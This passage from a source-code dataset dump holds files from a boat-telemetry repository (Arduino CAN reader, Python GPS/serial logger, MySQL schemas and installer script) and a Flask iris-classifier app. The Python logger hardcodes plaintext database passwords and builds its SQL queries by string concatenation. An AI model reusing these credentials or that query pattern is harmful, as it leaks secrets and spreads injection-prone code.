"text": "\n#include <mcp2515.h>\n\nMCP2515 mcp2515(10);\nstruct can_frame frame;\n\n\nint speedRPM;\nfloat current;\nfloat voltage;\nuint16_t mot_errCode; \nuint8_t controller_stat;\nuint8_t switch_stat;\n\nunsigned short int throttle; \nint contTemp;\nint motTemp;\n\n\nvoid setup()\n{\n Serial.begin(9600);\n// Serial.println(\"Initializing...\");\n \n mcp2515.reset();\n mcp2515.setBitrate(CAN_250KBPS, MCP_8MHZ);\n\n mcp2515.setNormalMode();\n\n// Serial.println(\"RPM, Throttle, I, V, Contr. Temp., Motor Temp., Switch status, Contr. status, Err. Code\");\n\n\n speedRPM = 1;\n current = 2;\n voltage = 3;\n mot_errCode = 4;\n controller_stat = 5;\n switch_stat = 6;\n throttle = 7;\n contTemp = 8;\n motTemp = 9;\n}\n\n\n\nvoid loop()\n{\n// delay(100);\n\n int errCode = mcp2515.readMessage(MCP2515::RXB1,&frame); \n if (errCode == MCP2515::ERROR_OK) {\n \n\n if (frame.can_id == 2364612101){ // MESSAGE 1\n\n speedRPM = frame.data[1]*256 + frame.data[0];\n current = (frame.data[3]*256 + frame.data[2])/10;\n voltage = (frame.data[5]*256 + frame.data[4])/10;\n\n mot_errCode = frame.data[6] & ( frame.data[7] << 8 );\n\n } else if (frame.can_id == 2364612357){ // MESSAGE 2\n throttle = frame.data[0];\n contTemp = frame.data[1] - 40;\n motTemp = frame.data[2] - 30;\n\n controller_stat = frame.data[4];\n switch_stat = frame.data[5];\n }\n\n\n\n \n } else if (errCode == MCP2515::ERROR_FAIL) {\n// Serial.println(\"ERROR_FAIL\");\n }else if (errCode == MCP2515::ERROR_ALLTXBUSY) {\n// Serial.println(\"ERROR_ALLTXBUSY\");\n }else if (errCode == MCP2515::ERROR_FAILINIT) {\n// Serial.println(\"ERROR_FAILINIT\");\n }else if (errCode == MCP2515::ERROR_FAILTX) {\n// Serial.println(\"ERROR_FAILTX\");\n }else if (errCode == MCP2515::ERROR_NOMSG) {\n// Serial.println(\"ERROR_NOMSG\");\n }\n\n\n\n if (Serial.available() > 0) {\n unsigned char incomingByte = Serial.read();\n// Serial.write(incomingByte);\n if (incomingByte == 0x53){\n unsigned char message[26];\n\n\n\n\n \n memcpy(message+0, &speedRPM, sizeof(speedRPM));\n memcpy(message+4, &throttle, sizeof(throttle));\n memcpy(message+6, ¤t, sizeof(current));\n memcpy(message+10, &voltage, sizeof(voltage));\n memcpy(message+14, &contTemp, sizeof(contTemp));\n memcpy(message+18, &motTemp, sizeof(motTemp));\n memcpy(message+22, &mot_errCode, sizeof(mot_errCode));\n memcpy(message+24, &controller_stat, sizeof(controller_stat));\n memcpy(message+25, &switch_stat, sizeof(switch_stat));\n \n \n Serial.write(message, 26);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5145228505134583,
"alphanum_fraction": 0.5695963501930237,
"avg_line_length": 22.87387466430664,
"blob_id": "da093185109b85f24110d8874df030b3d061f8c3",
"content_id": "4895d9cfd8897fe9ac5c786d1261e4051426169c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2651,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 111,
"path": "/communication/CAN/arduino_code/kls_can_read_chars.ino/kls_can_read_chars.ino.ino",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "\n#include <mcp2515.h>\n\nMCP2515 mcp2515(10);\nstruct can_frame frame;\n\n\nint speedRPM;\nfloat current;\nfloat voltage;\nuint16_t mot_errCode; \nuint8_t controller_stat;\nuint8_t switch_stat;\n\nunsigned short int throttle; \nint contTemp;\nint motTemp;\n\n\nvoid setup()\n{\n Serial.begin(9600);\n// Serial.println(\"Initializing...\");\n \n mcp2515.reset();\n mcp2515.setBitrate(CAN_250KBPS, MCP_8MHZ);\n\n mcp2515.setNormalMode();\n\n// Serial.println(\"RPM, Throttle, I, V, Contr. Temp., Motor Temp., Switch status, Contr. status, Err. Code\");\n\n\n speedRPM = 1;\n current = 2;\n voltage = 57;\n mot_errCode = 4;\n controller_stat = 5;\n switch_stat = 6;\n throttle = 7;\n contTemp = 8;\n motTemp = 9;\n}\n\n\n\nvoid loop()\n{\n delay(100);\n\n int errCode = mcp2515.readMessage(MCP2515::RXB1,&frame); \n delay(10);\n if (errCode == MCP2515::ERROR_OK) {\n \n\n if (frame.can_id == 2364612101){ // MESSAGE 1\n\n speedRPM = frame.data[1]*256 + frame.data[0];\n current = (frame.data[3]*256 + frame.data[2])/10;\n voltage = (frame.data[5]*256 + frame.data[4])/10;\n\n mot_errCode = frame.data[6] & ( frame.data[7] << 8 );\n\n } else if (frame.can_id == 2364612357){ // MESSAGE 2\n throttle = frame.data[0];\n contTemp = frame.data[1] - 40;\n motTemp = frame.data[2] - 30;\n\n controller_stat = frame.data[4];\n switch_stat = frame.data[5];\n }\n\n\n\n \n } else if (errCode == MCP2515::ERROR_FAIL) {\n// Serial.println(\"ERROR_FAIL\");\n }else if (errCode == MCP2515::ERROR_ALLTXBUSY) {\n// Serial.println(\"ERROR_ALLTXBUSY\");\n }else if (errCode == MCP2515::ERROR_FAILINIT) {\n// Serial.println(\"ERROR_FAILINIT\");\n }else if (errCode == MCP2515::ERROR_FAILTX) {\n// Serial.println(\"ERROR_FAILTX\");\n }else if (errCode == MCP2515::ERROR_NOMSG) {\n// Serial.println(\"ERROR_NOMSG\");\n }\n\n\n\n if (Serial.available() > 0) {\n unsigned char incomingByte = Serial.read();\n// Serial.write(incomingByte);\n if (incomingByte == 0x53){\n String message;\n\n String delim = \", \";\n\n char tmp_motErr[4];\n sprintf(tmp_motErr, \"%x\", mot_errCode);\n char tmp_cntrStat[4];\n sprintf(tmp_cntrStat, \"%x\", controller_stat);\n char tmp_swStat[4];\n sprintf(tmp_swStat, \"%x\", switch_stat);\n\n message = speedRPM + delim + throttle + delim\n + current + delim + voltage + delim\n + contTemp + delim + motTemp + delim\n + tmp_motErr + delim + tmp_cntrStat + delim + tmp_swStat;\n \n Serial.println(message);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7232142686843872,
"avg_line_length": 17.66666603088379,
"blob_id": "af2a93a021da11facfb447cd9eb2737ee5690641",
"content_id": "ee2ee9706e1d66f097a352fa039ef4df99805345",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 6,
"path": "/communication/CAN/SerialLog/voltage2energy.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "import csv\n\nimport numpy as np\n\ndef voltage2energy( volt, curveX, curveY ):\n np.interp(volt, curveX, curveY)\n"
},
{
"alpha_fraction": 0.7579618096351624,
"alphanum_fraction": 0.808917224407196,
"avg_line_length": 38.25,
"blob_id": "7205951228ebea85050ec171403374e7ae2c2faf",
"content_id": "b8e5d4b4063a21bafc4261f0bfad6c657420b484",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 157,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 4,
"path": "/README.md",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "## Monaco Energy 2019\n\nThis repository contains all code used for the telemetry of our vessel during\nthe Yacht Club de Monaco 2019 Energy Class Competition.\n"
},
{
"alpha_fraction": 0.7128713130950928,
"alphanum_fraction": 0.7315731644630432,
"avg_line_length": 52.47058868408203,
"blob_id": "365f65bfa22423c13f6920bffd605880f5044776",
"content_id": "e88e3a3c2af03d4160dcccc33cf97a05bc8c0e57",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 909,
"license_type": "permissive",
"max_line_length": 189,
"num_lines": 17,
"path": "/communication/SIM7600X/GSM/wwan0.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "echo \"wwan0 Network Setup Script\"\n\nsudo qmicli -d /dev/cdc-wdm0 --dms-set-operating-mode='online'\nsudo qmicli -d /dev/cdc-wdm0 --dms-get-operating-mode\nsudo qmicli -d /dev/cdc-wdm0 --nas-get-signal-strength\nsudo qmicli -d /dev/cdc-wdm0 --nas-get-home-network\n\nsudo qmicli -d /dev/cdc-wdm0 -w\t\t# this confirms the name of the network interface, typically wwan0\nsudo ip link set wwan0 down\t\t# change the wwan0 to the one returned above if different\necho 'Y' | sudo tee /sys/class/net/wwan0/qmi/raw_ip\nsudo ip link set wwan0 up\n#sudo qmicli -p -d /dev/cdc-wdm0 --device-open-net='net-raw-ip|net-no-qos-header' --wds-start-network=\"apn='internet,ip-type=4\" --client-no-release-cid\nsudo qmicli -p -d /dev/cdc-wdm0 --device-open-net='net-raw-ip|net-no-qos-header' --wds-start-network=\"apn='orange',username='orange',password='orange',ip-type=4\" --client-no-release-cid\n\nsudo udhcpc -i wwan0\nip a s wwan0\nip r s\n"
},
{
"alpha_fraction": 0.5747800469398499,
"alphanum_fraction": 0.5899760127067566,
"avg_line_length": 28.234375,
"blob_id": "d4764e995cba5eb40d4a58458546b996d23dd727",
"content_id": "af2586d63a4195bc342610f39c50bef8419ec26a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3751,
"license_type": "permissive",
"max_line_length": 299,
"num_lines": 128,
"path": "/communication/CAN/SerialLog/logArduPy.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport time\nimport serial\nfrom serial import Serial\nfrom datetime import datetime\nimport struct\nimport sys\n# from collections import namedtuple\nimport numpy as np\nimport mysql.connector as sql\nfrom scipy import interpolate\n\nfrom sys import argv\nimport gps\nimport requests\nimport socket\n\nlat = 0\nlon = 0\nspe_gps = 0\n\n# battFile = open('oceanos_cell_discharge_capacity_14s.csv', mode='r')\n# csv_reader = csv.DictReader(battFile)\nVdata = np.genfromtxt('oceanos_cell_discharge_capacity_14s.csv', dtype=float, delimiter=',', names=True)\nvx = Vdata['voltage']\nvy = Vdata['Percentage']\nfvolt = interpolate.interp1d(vx, vy)\n\nlocaldb = sql.connect(\nhost=\"127.0.0.1\",\nuser=\"root\",\npassword=\"a75033207\",\ndatabase = \"ocdb\"\n)\n\nsession = gps.gps(\"localhost\", \"2947\")\nsession.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)\n\n'''\nhostdb = sql.connect(\nhost=\"sql126.main-hosting.eu\",\nuser=\"u322154547_root\",\npasswd=\"oceanos_2019\",\ndatabase = \"test\"\n)\n'''\n\n# configure the serial connections (the parameters differs on the device you are connecting to)\nser = serial.Serial(\n port='/dev/ttyACM0',\n baudrate=9600,\n timeout = 1\n)\n\nser.isOpen()\nser.flush()\n\n# ser.setRTS(True)\n\ntime.sleep(2)\n\n\nprint('Log app for arduino CAN.')\n\nnow = datetime.now() # current date and time\ndate_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\nfilename = \"logs/can_log_\"+now.strftime(\"%d%m%Y-%H-%M\")+\".csv\";\n\n\nf= open(filename,\"w+\")\nf.write(date_time + '\\n')\nf.write('date, time, microseconds, speed, throttle, current, voltage, contTemp, motTemp, motErrCode, cntrStat, swStat, Discharge\\n')\nf.close()\n\nwhile 1 :\n ser.write(b'S')\n\n arduinoInput = ser.readline()\n out = datetime.now().strftime(\"%d/%m/%Y, %H:%M:%S, %f\") + ', ' + str(arduinoInput,'ASCII')\n\n elems = out.split(',')\n\n speed = elems[0+3].strip()\n throttle = elems[1+3].strip()\n current = elems[2+3].strip()\n voltage = elems[3+3].strip()\n contTemp = elems[4+3].strip()\n motTemp = elems[5+3].strip()\n motErrCode = elems[6+3].strip()\n cntrStat = elems[7+3].strip()\n swStat = elems[8+3].strip()\n \n \n rep = session.next()\n localcursor = localdb.cursor()\n try :\n if (rep[\"class\"] == \"TPV\"):\n lat = rep.lat\n lon = rep.lon\n spe_gps = rep.speed\n sendQuery_GPS = \"INSERT INTO gps (Latitude, Longitude, Speed) VALUES ('\"+str(lat)+\"','\"+str(lon)+\"','\"+str(spe_gps)+\"')\"\n localcursor.execute(sendQuery_GPS)\n localdb.commit()\n except Exception as e :\n pass\n \n # print(Vdata['Percentage'])\n energy = fvolt(float(voltage))\n\n # print(energy)\n out = out.strip('\\n').strip('\\r') + ', ' + str(energy) + ', ' + str(lat) + ', ' + str(lon) + ', ' + str(spe_gps) +'\\n'\n\n f= open(filename,\"a+\")\n f.write(\"%s\" % out)\n f.close()\n \n print(out)\n sendQuery_CAN = \"INSERT INTO motor (speed, throttle, current, voltage, contrTemp, motorTemp, motErrCode, cntrStat, swStat, energy) VALUES ('\"+speed+\"','\"+throttle+\"','\"+current+\"','\"+voltage+\"','\"+contTemp+\"','\"+motTemp+\"','\"+motErrCode+\"','\"+cntrStat+\"','\"+swStat+\"','\"+str(energy)+\"')\"\n \n localcursor.execute(sendQuery_CAN)\n localdb.commit()\n \n '''\n hostcursor = hostdb.cursor()\n hostcursor.execute(\"INSERT INTO motor (speed, throttle, current, voltage, contrTemp, motorTemp, motErrCode, cntrStat, swStat, energy) VALUES 
('\"+speed+\"','\"+throttle+\"','\"+current+\"','\"+voltage+\"','\"+contTemp+\"','\"+motTemp+\"','\"+motErrCode+\"','\"+cntrStat+\"','\"+swStat+\"','\"+str(energy)+\"')\")\n hostdb.commit()\n '''\n \n"
},
{
"alpha_fraction": 0.7899159789085388,
"alphanum_fraction": 0.8403361439704895,
"avg_line_length": 22.600000381469727,
"blob_id": "5363604028e5f52ca1102ebc7ce761cd02f42639",
"content_id": "571c021bd4f01e72787c3fdc1c5f0404f8e8964e",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "INI",
"length_bytes": 119,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 5,
"path": "/communication/CAN/arduino_code/vendor/arduino-mcp2515-master/sonar-project.properties",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "sonar.projectKey=autowp_arduino-mcp2515\nsonar.projectName=WheelsAge Backend\nsonar.projectVersion=1.0\n\nsonar.sources=.\n\n"
},
{
"alpha_fraction": 0.7358490824699402,
"alphanum_fraction": 0.7547169923782349,
"avg_line_length": 25.5,
"blob_id": "db0abcb5613854dc01c819b3c1bddac39210ff8c",
"content_id": "58f4aec1f9da9cd80d649e16a1089af507f68e68",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 2,
"path": "/communication/SIM7600X/GPS/reset_gps.sql",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "DELETE FROM gps;\nALTER TABLE gps AUTO_INCREMENT = 1;\n"
},
{
"alpha_fraction": 0.5629860162734985,
"alphanum_fraction": 0.6018662452697754,
"avg_line_length": 32.842105865478516,
"blob_id": "f78f88226449ccb0b73dd11a0e07cb1933bed8c2",
"content_id": "8c28721a764fad66bb82f44d69f6cfe1098a48b4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 643,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 19,
"path": "/database/sql/motor.sql",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "-- ---------------------------\n-- Table structure for motor\n-- ---------------------------\nCREATE TABLE IF NOT EXISTS `motor` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `speed` INT DEFAULT '0',\n `throttle` INT DEFAULT '0',\n `current` DECIMAL(4,2) DEFAULT '0',\n `voltage` DECIMAL(6,2) DEFAULT '0',\n `contrTemp` DECIMAL(6,2) DEFAULT '0',\n `motorTemp` DECIMAL(6,2) DEFAULT '0',\n `motErrCode` VARCHAR(8) DEFAULT '0',\n `cntrStat` VARCHAR(8) DEFAULT '0',\n `swStat` VARCHAR(8) DEFAULT '0',\n `energy` DECIMAL(4,2) DEFAULT '0',\n `Time` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n `serverSideName` VARCHAR(15) DEFAULT 'motor',\n PRIMARY KEY (`id`)\n);\n"
},
{
"alpha_fraction": 0.5677083134651184,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 9.666666984558105,
"blob_id": "df974e701365f418b7ba5fd9bdc0f60990910422",
"content_id": "6797fd391cbebe09defbf2c753cb01de997c9598",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 192,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 18,
"path": "/communication/SIM7600X/GPS/GPSloc.cpp",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#include \"GPSloc.h\"\n\nGPSloc::GPSloc()\n{\n\tLat = 0;\n\tLog = 0;\n\tSpeed = -1;\n}\n\nGPSloc::GPSloc(float lat, float log, float speed)\n{\n\tLat = lat;\n\tLog = log;\n\tSpeed = speed;\n}\n\nGPSloc::~GPSloc(){\n}\n"
},
{
"alpha_fraction": 0.4699999988079071,
"alphanum_fraction": 0.5049999952316284,
"avg_line_length": 16,
"blob_id": "f9a2524f75c6763f8c1b18b4121b1ab8751ec7c3",
"content_id": "a68e7b24cd570dc2fa69a5154482332ae12d5e79",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 200,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 11,
"path": "/communication/SIM7600X/GPS/Makefile",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "CC=g++\r\nDLIBS=-lbcm2835 -lrt -lpthread\r\nOBJS= GPS.o ../arduPi.o ../sim7x00.o GPSloc.o\r\nSMS:$(OBJS) \r\n\t$(CC) -Wall -o GPS $(OBJS) $(DLIBS) \r\n\r\n%.o:%.c\r\n\t$(CC) -c -o $@ $<\r\n\r\nclean:\r\n\trm -f *.o GPS\r\n\r\n"
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 16.600000381469727,
"blob_id": "0eb50d54a902d7048e14ca9df7ec3b924710d4a8",
"content_id": "d9cb29f1fecbe66a23e6f2f8ca51da02b361bc87",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 176,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 10,
"path": "/communication/CAN/SerialLog/logCANOutput.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ntouch logs/log.csv\n# echo < /dev/ttyACM0\n# tail -f /dev/ttyACM0 # >> logs/log.csv\n\n# read -r line < /dev/ttyACM0\n# echo -n $line >> logs/log.csv\n\ncat /dev/ttyACM0\n"
},
{
"alpha_fraction": 0.6405465006828308,
"alphanum_fraction": 0.6453686952590942,
"avg_line_length": 27.440000534057617,
"blob_id": "1bee106f382b5a990afbb7d586ce1886dae85b60",
"content_id": "27ccf3575d209c26c1ed527e4976e61e478e1c85",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 4977,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 175,
"path": "/database/tools/db_installer.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "configure() {\necho \"#############################################\"\necho \"# You entered script configuration area #\"\necho \"# No change will be performed in your DB #\"\necho \"# I will just ask you some questions about #\"\necho \"# your hosts and DB. #\"\necho \"#############################################\"\nMYSQLDUMPPATH=`which mysqldump 2>/dev/null`\nMYSQLPATH=`which mysql 2>/dev/null`\nif [ $? -ne 0 ]; then\necho \"We were unable to find MySQL binaries on your path\"\nwhile :\n do\n echo -ne \"\\nPlease enter MySQL binaries directory (no trailing slash): \"\n read MYSQLBINPATH\n if [ -e \"$MYSQLBINPATH\" ] && [ -d \"$MYSQLBINPATH\" ] && [ -e \"$MYSQLBINPATH/mysqldump\" ] && [ -e \"$MYSQLBINPATH/mysql\" ]; then\n MYSQLDUMPPATH=\"$MYSQLBINPATH/mysqldump\"\n MYSQLPATH=\"$MYSQLBINPATH/mysql\"\n break\n else\n echo \"The data you entered is invalid. Please verify and try again.\"\n exit 1\n fi\n done\nfi\n#DB\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server hostname (default localhost): \"\nread OCDBHOST\nif [ -z \"$OCDBHOST\" ]; then\n OCDBHOST=\"localhost\"\nfi\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server database name (default ocdb): \"\nread OCDB\nif [ -z \"$OCDB\" ]; then\n OCDB=\"ocdb\"\nfi\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server user (default root): \"\nread OCUSER\nif [ -z \"$OCUSER\" ]; then\n OCUSER=\"root\"\nfi\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server $OCUSER's password (won't be displayed) :\"\nstty -echo\nread OCPASS\nstty echo\necho \"\"\nif [ -z \"$OCPASS\" ]; then\n echo \"Hum.. I'll let it be but don't be stupid and avoid empty passwords\"\nelif [ \"$OCUSER\" == \"$OCPASS\" ]; then\n echo \"Your password is the same as your user, consider changing that.\"\nfi\nsave_config $1\n}\n\nsave_config() {\nif [ -n \"$1\" ]; then\nCONF=\"$1\"\nelse \nCONF=\"database_installer.rc\"\nfi\necho \"\"\necho \"With these data I can generate a configuration file which can be read\"\necho \"on future updates. WARNING: this file will contain clear text passwords!\"\necho -ne \"Shall I generate config file $CONF? (Y/n):\"\nread SAVE\nif [ \"$SAVE\" == \"y\" -o \"$SAVE\" == \"Y\" -o \"$SAVE\" == \"\" ]; then\ncat <<EOF>$CONF\n#Configuration settings for Oceanos-Dashboard database installer script\nMYSQLDUMPPATH=$MYSQLDUMPPATH\nMYSQLPATH=$MYSQLPATH\nOCDBHOST=$OCDBHOST\nOCDB=$OCDB\nOCUSER=$OCUSER\nOCPASS=$OCPASS\nEOF\nchmod 600 $CONF\necho \"Configuration saved as $CONF\"\necho \"Permissions changed to 600 (rw- --- ---)\"\nelif [ \"$SAVE\" != \"n\" -a \"$SAVE\" != \"N\" ]; then\n save_config\nfi\n}\n\nload_config() {\nif [ -n \"$1\" ]; then\nCONF=\"$1\"\nelse \nCONF=\"database_installer.rc\"\nfi\nif [ -e \"$CONF\" ] && [ -f \"$CONF\" ]; then\n. 
$CONF\nelse\necho \"Settings file not found: $CONF\"\necho \"You can specify an alternate settings filename:\"\necho $0 config_filename\necho \"\"\necho \"If file doesn't exist it can be created\"\necho \"If nothing is specified script will try to work with ./database_installer.rc\"\necho \"\"\nconfigure $CONF\nfi\n}\n\naskdatabase(){\necho \"#############################################\"\necho \"# WARNING: This section of the script CAN #\"\necho \"# destroy your whole database informatio #\"\necho \"# Read questions carefully before you reply #\"\necho \"#############################################\"\necho \"\"\necho \"Choose full (f) if you don't have any table or would\"\necho \"prefer to erase the existing tables information.\"\necho \"Choose skip (s) to skip Oceanos DB installation and go to\"\necho -ne \"Oceanos DB install type: (f) full, (q) quit? \"\nread OCDBPROMPT\ncase \"$OCDBPROMPT\" in\n\t\"f\"|\"F\") dbinstall; dbupgrade;;\n\t\"q\"|\"Q\") finish;;\n\t*) askdatabase;;\nesac\n}\n\ndbinstall(){\necho \"Deleting database tables for new content.\"\n#$MYDB < login_install.sql &> /dev/null\nsudo $MYSQLDUMPPATH --add-drop-table -h $OCDBHOST -u $OCUSER --password=$OCPASS $OCDB --no-data | grep ^DROP | $MYDB\n}\n\ndbupgrade(){\necho \"Installling new Oceanod Database content.\"\n$MYDB < ../sql/gps.sql &> /dev/null\n$MYDB < ../sql/motor.sql &> /dev/null\n}\n\nocdbackup(){\nwhile :\n do\n echo \"\"\n echo -ne \"Do you want to make a backup copy of your OCDB? (Y/n): \"\n read BKUP\n if [ \"$BKUP\" == \"Y\" -o \"$BKUP\" == \"y\" -o \"$BKUP\" == \"\" ]; then\n echo \"Making a backup of the original Oceanos Dashboard database.\"\n echo \"\"\n sudo $MYSQLDUMPPATH --add-drop-table -h $OCDBHOST -u $OCUSER --password=$OCPASS $OCDB > oceanosdb_backup.sql\n if [ $? -ne 0 ];then\n echo \"\"\n echo \"There was a problem accesing your Oceanos database, either it wasnt created or authentication data is incorrect.\"\n exit 1\n fi\n break\n elif [ \"$BKUP\" == \"n\" -o \"$BKUP\" == \"N\" ]; then\n break\n fi\n done \n}\n\ncreatedatabase(){\necho \"Creating Database if it doesn't exist\"\nmysql --user=$OCUSER --password=$OCPASS -e \"CREATE DATABASE IF NOT EXISTS $OCDB;\"\n}\n\nfinish(){\necho \"\"\necho \"Script execution finished.\"\nexit 0\n}\n\nclear\n\nload_config $1\ncreatedatabase\nMYDB=\"$MYSQLPATH -h $OCDBHOST -u $OCUSER --password=$OCPASS -D $OCDB\"\nocdbackup\naskdatabase\ncp $CONF ../../communication/SIM7600X/GPS\n"
}
] | 24 |
van010/code
|
https://github.com/van010/code
|
845b313f56b6c11845c8ff52651124ea8d8aa034
|
61889d51e81d6cc7925910e74427b17264b7efec
|
85010fefaec5b60a6960a1de75eda3b4ab8af640
|
refs/heads/main
| 2023-03-12T02:28:00.585332 | 2021-02-28T10:49:18 | 2021-02-28T10:49:18 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6495016813278198,
"alphanum_fraction": 0.6495016813278198,
"avg_line_length": 19.066667556762695,
"blob_id": "f02b53527baee4aa1e02b59b139839e9b925d6a5",
"content_id": "08fd5bbf6df609d140f4539f91f40bfd428f8167",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 602,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/app.py",
"repo_name": "van010/code",
"src_encoding": "UTF-8",
"text": "import joblib\nimport numpy as np\nfrom flask import Flask, render_template, request\n\n\nmodel = joblib.load('iris.pkl')\napp = Flask(__name__)\n\n\[email protected]('/')\ndef home():\n return render_template('home.html')\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n petal_length = request.form['petal_length']\n petal_width = request.form['petal_width']\n arr = np.array([[petal_length, petal_width]])\n predict_ = model.predict(arr)\n return render_template('result.html', data=predict_)\n\n\[email protected]('/figure')\ndef figure():\n pass\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.5844529867172241,
"alphanum_fraction": 0.609404981136322,
"avg_line_length": 27.16216278076172,
"blob_id": "b4507318f7d56b9f38c925e9e32e0faacc300dcd",
"content_id": "a6ef416732355dbf3dc520a8b176db66475aae19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1042,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/iris.py",
"repo_name": "van010/code",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport joblib\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\n\niris = datasets.load_iris()\nX = iris['data'][:, (2, 3)] # petal length and petal width\ny = (iris['target']).astype(np.float64)\nprint((iris['target'] == 2).astype(np.float64))\n\n\ndef plot_raw_iris():\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'b^', label='setosa')\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'r*', label='versicolor')\n plt.plot(X[:, 0][y == 2], X[:, 1][y == 2], 'gs', label='virginica')\n plt.grid()\n plt.legend(loc='best')\n # plt.savefig('iris_demo') # , facecolor='w', edgecolor='w', orientation='portrait')\n plt.show()\n\n\n\n\n\n\n# svm_clf = Pipeline([\n# ('scaler', StandardScaler()),\n# ('linear_svc', LinearSVC(C=1, loss='hinge', random_state=42))\n# ])\n# svm_clf.fit(X, y)\n#\n# print(svm_clf.predict([[4.9, 1.6]]))\n# joblib.dump(svm_clf, 'iris.pkl')\n"
}
] | 2 |
jeffduda/aries-app
|
https://github.com/jeffduda/aries-app
|
d0088979538f7d90e77cff59da23c43d2ab7e251
|
5609b9cd76581cef693c51ca7fde3b3a88bbda5b
|
b4a9efd203478b08bf6e11bf55c83cd54f37bd34
|
refs/heads/master
| 2023-05-13T23:15:09.312919 | 2023-05-03T18:26:45 | 2023-05-03T18:26:45 | 177,214,319 | 1 | 1 | null | 2019-03-22T21:59:42 | 2023-01-26T21:22:23 | 2023-05-03T18:26:45 |
Python
|
[
{
"alpha_fraction": 0.5744680762290955,
"alphanum_fraction": 0.7340425252914429,
"avg_line_length": 12.428571701049805,
"blob_id": "c8d3adfdaa16fc1714adc38234ac2763fc464866",
"content_id": "642db7b329e65ab577a1d530a45d5abbe69cc397",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 7,
"path": "/requirements.txt",
"repo_name": "jeffduda/aries-app",
"src_encoding": "UTF-8",
"text": "Flask==2.3.2\nWerkzeug<0.13.0,>=0.12.0\nflask-bootstrap\nnumpy==1.22.0\nflask_wtf\nopenpyxl\npandas\n"
},
{
"alpha_fraction": 0.3350323736667633,
"alphanum_fraction": 0.5673781633377075,
"avg_line_length": 60.149349212646484,
"blob_id": "e40ce878460c20ac871df9baadc80da7915bd275",
"content_id": "19440efdd2d35728159c841b0d42904215e8d117",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
